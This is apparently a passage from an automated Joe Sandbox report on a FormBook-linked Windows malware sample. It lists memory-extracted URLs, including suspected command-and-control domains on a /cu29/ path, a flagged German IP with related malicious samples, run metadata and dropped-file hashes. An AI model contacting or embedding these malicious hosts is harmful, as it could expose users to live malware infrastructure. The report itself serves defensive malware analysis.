                                                                                                https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.microexplorer.exe, 00000006.00000002.4004189778.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4004218342.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4001297704.0000000002C80000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://wns.windows.com/EM0explorer.exe, 00000006.00000003.2657529257.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2288001841.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077089186.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4008024188.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.leachlondonstore.online/cu29/www.5mwhs.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.68716329.xyz/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.azino-forum-pro.onlineexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.siabgc4d.onlineReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.siabgc4d.onlineexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.5mwhs.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.irex.infoReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.apita.top/cu29/www.oldsteps.buzzexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.48372305.top/cu29/www.77179ksuhr.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.68716329.xyzexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.oldsteps.buzz/cu29/www.srtio.xyzexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.nd-los.netexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.irex.info/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.77179ksuhr.topReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.48372305.top/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.77179ksuhr.top/cu29/www.f6b-crxy.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.f6b-crxy.top/cu29/www.azino-forum-pro.onlineexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.f6b-crxy.topReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.77179ksuhr.top/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.yzq0n.topReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://ns.adobeSexplorer.exe, 00000006.00000002.4002256173.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1545593009.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.5mwhs.top/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.srtio.xyzReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.inn-paaaa.buzzexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            85.13.166.18
                                                                                                                            		www.irex.infoGermany
                                                                                                                            		34788NMM-ASD-02742FriedersdorfHauptstrasse68DEtrue

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1569252
                                                                                                                            Start date and time:2024-12-05 16:48:10 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 11m 56s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:15
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:1
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:JHnNxt6Pnb.exe
                                                                                                                            renamed because original name is a hash value
                                                                                                                            Original Sample Name:a6d2a47171f9630a8db62eb4001e196dfbad94cf40638e108cc649883d1bc069.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.evad.winEXE@525/6@11/1
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 105
                                                                                                                            • Number of non-executed functions: 337
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • VT rate limit hit for: JHnNxt6Pnb.exe

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            10:49:19API Interceptor2x Sleep call for process: JHnNxt6Pnb.exe modified
                                                                                                                            10:49:21API Interceptor26x Sleep call for process: powershell.exe modified
                                                                                                                            10:49:33API Interceptor6694860x Sleep call for process: explorer.exe modified
                                                                                                                            10:50:10API Interceptor6004509x Sleep call for process: ipconfig.exe modified

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            85.13.166.18Statement of Account.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.irex.info/cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo&QZ0=dhoHn4gPjl4PNT
                                                                                                                            New PO 127429.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.irex.info/cu29/?u6Zt=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNgnCDylQV65J9tAeA==&kR-l=xP68RjTX
                                                                                                                            Payment Reciept FL202306150003 Request 10273 Konturteile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                            • www.irex.info/cu29/?lv1DT=Y2Jlpvjp8x-0AHv&iBZlUlWP=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNsnRT+mJF6v
                                                                                                                            Request For PO-230102.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.irex.info/cu29/?Dzr=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNgedySmeDm+J9tHNw==&R2M=Gpg8ENjxBfvTXZ1

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            www.irex.infoStatement of Account.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.13.166.18
                                                                                                                            New PO 127429.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.13.166.18
                                                                                                                            RFQ 242024.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.13.166.18
                                                                                                                            Payment Reciept FL202306150003 Request 10273 Konturteile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                            • 85.13.166.18
                                                                                                                            October 2024 PricesOffer Rates.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.13.166.18
                                                                                                                            Request For PO-230102.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.13.166.18

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            NMM-ASD-02742FriedersdorfHauptstrasse68DEhttp://theluckyhouse.vn/dnkdlGet hashmaliciousUnknownBrowse
                                                                                                                            • 85.13.134.160
                                                                                                                            https://ampa.fi/uEvMZCXCvXGet hashmaliciousUnknownBrowse
                                                                                                                            • 85.13.154.145
                                                                                                                            Statement of Account.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.13.166.18
                                                                                                                            New PO 127429.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.13.166.18
                                                                                                                            nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 85.13.184.4
                                                                                                                            Payment Reciept FL202306150003 Request 10273 Konturteile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                            • 85.13.166.18
                                                                                                                            4ui8luUSNp.exeGet hashmaliciousCoinhive, XmrigBrowse
                                                                                                                            • 85.13.166.174
                                                                                                                            Request For PO-230102.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.13.166.18
                                                                                                                            https://allegro-worxx.de/Get hashmaliciousUnknownBrowse
                                                                                                                            • 85.13.161.130
                                                                                                                            https://atpscan.global.hornetsecurity.com/?d=48cXMF0z7lMlWaR4-PlsbtUc8mFiMfFFndJRjEPuYtN-uYwWsyWxL5J5MR-Ug5CE&f=dme3IKUCx1CkAEFqHg7DwPw18BP_OQlvudnvuL33-Lpo64IRdbltM4_7BbS22Zf4&i=&k=uvEU&m=C-1BZKEYF-Cl5rwq0_FrWo_rnOtg9J2VjL7wG_KiYQ4zCmrhfgeCWZm7jI2FLiWiujyVfZXhjPSaNszUHd_-tPPbHZVMqnN_KxIKzjHidCoVjgDEgxtyWq50QMIznX31&n=msheiBXClL42beZAq-0MKeu_K3YWbf4RbFSWB4nMvrZjKHZvlfgqWpnAMmHJM8nOBGwYdLcEaXDrA0ElMeqJyA&r=qQoQsacw6FZ-pWCR9Ygk8d_uohNhiBjvfkDS9IBTRytjYPkbqiDbNjzjfMkGfqGW&s=c3334c9337ad200a046268dabfc48b0b462d8959b1985605036142fc4b1a8f81&u=https%3A%2F%2Fmqqaqm.clicks.mlsend.com%2Ftb%2Fc%2FeyJ2Ijoie1wiYVwiOjEwNjMxNTQsXCJsXCI6MTMxNjM1NDA2NzI2NzU5NjE3LFwiclwiOjEzMTYzNTQwNjk1MTE1NTExNX0iLCJzIjoiMWU0NDhhM2JiYjBjYmJmOSJ9Get hashmaliciousUnknownBrowse
                                                                                                                            • 85.13.157.247

                                                                                                                            JA3 Fingerprints

                                                                                                                            No context

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JHnNxt6Pnb.exe.log

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\JHnNxt6Pnb.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:true
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Download File
